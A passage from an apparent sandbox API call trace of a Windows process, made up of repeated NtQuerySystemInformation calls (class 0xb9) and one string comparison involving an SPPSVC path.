SystemInformation=0xc7520fe390, Length=0x28, ResultLength=0x0) [0226.493] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.493] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.493] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe4f0, Length=0x38, ResultLength=0x0) [0226.493] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.493] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe410, Length=0x28, ResultLength=0x0) [0226.495] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.495] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.495] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.495] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe410, Length=0x28, ResultLength=0x0) [0226.496] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe2b0, Length=0x20, ResultLength=0x0) [0226.496] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe230, Length=0x20, ResultLength=0x0) [0226.496] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.496] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe230, Length=0x20, ResultLength=0x0) [0226.496] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.496] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe230, Length=0x20, ResultLength=0x0) [0226.496] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.496] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.496] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.496] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.496] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.497] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe4f0, Length=0x38, ResultLength=0x0) [0226.497] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.497] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe4f0, Length=0x38, ResultLength=0x0) [0226.497] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe370, Length=0x20, ResultLength=0x0) [0226.497] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe300, Length=0x20, ResultLength=0x0) [0226.497] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.497] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.497] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.497] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fe300, Length=0x20, ResultLength=0x0) [0226.497] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.497] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.498] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.498] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.498] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.498] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.498] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.502] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd540, Length=0x50, ResultLength=0x0) [0226.502] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.502] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd540, Length=0x50, ResultLength=0x0) [0226.502] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.502] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd540, Length=0x50, ResultLength=0x0) [0226.502] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd430, Length=0x50, ResultLength=0x0) [0226.502] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.502] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd430, Length=0x50, ResultLength=0x0) [0226.502] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.502] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd430, Length=0x50, ResultLength=0x0) [0226.503] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.503] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd430, Length=0x50, ResultLength=0x0) [0226.503] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.503] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd360, Length=0x38, ResultLength=0x0) [0226.505] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.505] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd190, Length=0x28, ResultLength=0x0) [0226.505] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.505] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.505] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd190, Length=0x28, ResultLength=0x0) [0226.505] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.505] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.505] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd190, Length=0x28, ResultLength=0x0) [0226.505] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.505] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.505] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd190, Length=0x28, ResultLength=0x0) [0226.505] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.506] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.506] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd200, Length=0x28, ResultLength=0x0) [0226.506] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.506] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.506] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd360, Length=0x38, ResultLength=0x0) [0226.506] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.506] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd280, Length=0x28, ResultLength=0x0) [0226.510] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.510] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.510] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.511] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd280, Length=0x28, ResultLength=0x0) [0226.511] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd120, Length=0x20, ResultLength=0x0) [0226.511] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd0a0, Length=0x20, ResultLength=0x0) [0226.511] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.511] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd0a0, Length=0x20, ResultLength=0x0) [0226.511] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.511] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd0a0, Length=0x20, ResultLength=0x0) [0226.511] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.511] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.511] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.511] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.511] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.511] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd360, Length=0x38, ResultLength=0x0) [0226.512] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.512] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd360, Length=0x38, ResultLength=0x0) [0226.512] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1e0, Length=0x20, ResultLength=0x0) [0226.512] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd170, Length=0x20, ResultLength=0x0) [0226.512] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.512] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.512] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.512] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd170, Length=0x20, ResultLength=0x0) [0226.512] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.512] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.512] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.512] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.512] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.513] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.513] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.514] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd790, Length=0x50, ResultLength=0x0) [0226.514] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.514] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd790, Length=0x50, ResultLength=0x0) [0226.514] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.514] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd790, Length=0x50, ResultLength=0x0) [0226.515] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd680, Length=0x50, ResultLength=0x0) [0226.515] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.515] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd680, Length=0x50, ResultLength=0x0) [0226.515] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.515] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd680, Length=0x50, ResultLength=0x0) [0226.515] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.515] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd680, Length=0x50, ResultLength=0x0) [0226.515] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.515] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd5b0, Length=0x38, ResultLength=0x0) [0226.518] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.519] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd3e0, Length=0x28, ResultLength=0x0) [0226.519] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.519] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.519] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd3e0, Length=0x28, ResultLength=0x0) [0226.519] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.519] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.519] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd3e0, Length=0x28, ResultLength=0x0) [0226.519] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.519] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.519] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd450, Length=0x28, ResultLength=0x0) [0226.519] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.519] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.519] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd5b0, Length=0x38, ResultLength=0x0) [0226.520] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.520] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd4d0, Length=0x28, ResultLength=0x0) [0226.521] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.522] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.522] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.522] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.522] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.522] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.522] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd4d0, Length=0x28, ResultLength=0x0) [0226.522] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.522] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.522] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd5b0, Length=0x38, ResultLength=0x0) [0226.523] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd430, Length=0x20, ResultLength=0x0) [0226.523] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd3b0, Length=0x20, ResultLength=0x0) [0226.523] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.523] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd3b0, Length=0x20, ResultLength=0x0) [0226.523] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.523] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd3b0, Length=0x20, ResultLength=0x0) [0226.523] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.523] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.523] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.523] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.523] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd5b0, Length=0x38, ResultLength=0x0) [0226.524] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd430, Length=0x20, ResultLength=0x0) [0226.524] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd3c0, Length=0x20, ResultLength=0x0) [0226.524] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.524] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.524] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.524] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd3c0, Length=0x20, ResultLength=0x0) [0226.524] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.524] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.524] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.524] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.524] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.524] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.524] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.525] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd790, Length=0x50, ResultLength=0x0) [0226.525] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.525] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd790, Length=0x50, ResultLength=0x0) [0226.525] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.525] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd790, Length=0x50, ResultLength=0x0) [0226.525] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd680, Length=0x50, ResultLength=0x0) [0226.525] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.525] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd680, Length=0x50, ResultLength=0x0) [0226.525] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.525] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd680, Length=0x50, ResultLength=0x0) [0226.525] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.526] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd680, Length=0x50, ResultLength=0x0) [0226.526] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.526] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd5b0, Length=0x38, ResultLength=0x0) [0226.529] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.529] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd3e0, Length=0x28, ResultLength=0x0) [0226.529] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.529] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.529] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd3e0, Length=0x28, ResultLength=0x0) [0226.529] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.529] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.529] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd3e0, Length=0x28, ResultLength=0x0) [0226.530] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.530] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.530] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd450, Length=0x28, ResultLength=0x0) [0226.530] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.530] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.530] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd5b0, Length=0x38, ResultLength=0x0) [0226.530] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.530] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd4d0, Length=0x28, ResultLength=0x0) [0226.532] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.532] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.532] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.532] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.532] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.532] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.532] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd4d0, Length=0x28, ResultLength=0x0) [0226.533] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.533] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.533] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd5b0, Length=0x38, ResultLength=0x0) [0226.533] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd430, Length=0x20, ResultLength=0x0) [0226.533] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd3b0, Length=0x20, ResultLength=0x0) [0226.533] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.533] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd3b0, Length=0x20, ResultLength=0x0) [0226.533] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.533] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd3b0, Length=0x20, ResultLength=0x0) [0226.533] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.533] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.533] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.533] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.534] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd5b0, Length=0x38, ResultLength=0x0) [0226.534] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd430, Length=0x20, ResultLength=0x0) [0226.534] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd3c0, Length=0x20, ResultLength=0x0) [0226.534] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.534] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.534] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.534] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd3c0, Length=0x20, ResultLength=0x0) [0226.534] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.534] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.534] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.534] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.534] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.534] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.535] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.535] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd840, Length=0x50, ResultLength=0x0) [0226.535] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd7c0, Length=0x28, ResultLength=0x0) [0226.535] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f\\4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0226.535] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.535] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.535] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd840, Length=0x50, ResultLength=0x0) [0226.535] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.535] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd840, Length=0x50, ResultLength=0x0) [0226.535] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.535] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd840, Length=0x50, ResultLength=0x0) [0226.536] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.536] NtQuerySystemInformation (SystemInformationClass=0xb9, 